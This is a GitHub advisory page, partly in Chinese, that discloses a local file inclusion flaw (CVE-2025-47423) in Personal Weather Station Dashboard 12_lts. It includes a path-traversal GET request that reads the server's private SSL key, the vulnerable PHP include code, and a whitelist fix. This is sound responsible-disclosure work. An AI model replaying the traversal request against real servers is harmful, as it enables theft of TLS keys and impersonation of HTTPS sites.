Haluka92/CVE-2025-47423
GitHub: Haluka92/CVE-2025-47423
该项目是针对 Personal Weather Station Dashboard 中本地文件包含漏洞(CVE-2025-47423)的安全披露报告,包含漏洞分析和修复方案。
Stars: 0 | Forks: 0
# CVE-2025-47423 – Personal Weather Station Dashboard (12_lts) 中的本地文件包含漏洞
**发现者:** Matthew Eagle
**状态:** 公开披露
**报告日期:** 2025-05-05
**CVE ID:** CVE-2025-47423
## 🧩 摘要
`Personal Weather Station Dashboard` 版本 `12_lts` 中存在一个本地文件包含 (LFI) 漏洞,允许未经身份验证的远程攻击者读取服务器上的任意文件。利用此漏洞可以访问敏感文件(包括私有 SSL 密钥),这可能会危及 HTTPS 连接的机密性和完整性。
## 🛠 受影响组件
- 文件:`/others/_test.php`
- 存在漏洞的参数:`test` (通过 GET 请求)
## 📈 影响
此漏洞允许远程攻击者:
- 读取文件系统上的任意文件
- 泄露私有 SSL 密钥(例如 `server.key`)
- 发起中间人 (MITM) 攻击
- 伪装成 HTTPS 服务器
**CVSS**:5.8 中危
## 💥 概念验证 (PoC)
```
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
```
响应:
```
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
```
## 🧪 存在漏洞的代码(简化版)
```
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
```
`str_replace` 不足以防止目录遍历。
## 🔐 安全修复
- 对包含目标使用严格的白名单机制
- 使用 `basename()` 对输入进行过滤,并与允许的文件列表进行核对
- 避免基于用户输入进行动态包含
```
$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
```
## 📅 时间线
| 日期 | 事件 |
|-------------|-------|
| 2025-05-05 | 向 PWS Dashboard 维护者报告漏洞 |
| 2025-05-06 | 确认漏洞并进行测试 |
| 2025-05-07 | 通过 MITRE 预留 CVE-2025-47423 |
| 待定 | 等待公开补丁和 CVE 列出 |
## 🧠 缓解措施
如果您正在运行 `Personal Weather Station Dashboard 12_lts`,您应该:
- 立即删除或更新 `_test.php`
- 实施带有文件白名单机制的修复脚本
- 轮换并重新签发任何已泄露的 TLS 证书
## 🧾 参考
- [MITRE 上的 CVE-2025-47423 (待定)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47423)
- [发布在 GitHub 上的安全通告](https://github.com/haluka92/CVE-2025-47423)
## 🙏 致谢
该漏洞由 **Matthew Eagle** 发现并负责任地披露
联系方式:[meagle2006@gmail.com](mailto:meagle2006@gmail.com)
_本次披露遵循负责任的披露准则。发布此文档仅出于教育和防御目的。_
标签:HTTP工具, OpenVAS, PHP, PoC, Web安全, 暴力破解, 本地文件包含, 漏洞披露, 蓝队分析